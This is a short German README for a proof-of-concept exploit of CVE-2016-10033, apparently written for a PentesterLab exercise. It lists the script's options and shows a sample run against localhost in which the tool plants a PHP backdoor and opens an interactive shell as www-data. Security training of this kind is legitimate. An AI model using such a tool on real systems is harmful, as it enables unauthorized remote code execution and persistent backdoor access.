
Ein PoC für CVE-2016-10033, den ich für PentesterLab erstellt habe.
Dies habe ich für PentesterLab geschrieben.
Wenn Sie von PentesterLab sind, schummeln Sie nicht, es ist viel besser zu lernen.
Hoffe es ist für jemanden nützlich, wenn nicht für mich in der Zukunft :)
Hat interaktive Shell, nette argparse-Sachen auch.
usage: poc.py [-h] [--target TARGET] [--backdoor BACKDOOR] [--proxy] [--raw] [--no-color]
options:
-h, --help show this help message and exit
--target TARGET Target URL
--backdoor BACKDOOR Backdoor path
--proxy Use local proxy
--raw Show raw output
--no-color Disable colored output
$ python3 poc.py --target http://localhost:8000 --proxy
[+] Using random backdoor name: caxvcs009f.php
[+] Sending exploit to target...
[+] Testing backdoor...
[+] Backdoor working! Test output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Starting interactive shell...
[+] Type "exit" to quit
--------------------------------------------------
shell> whoami
www-data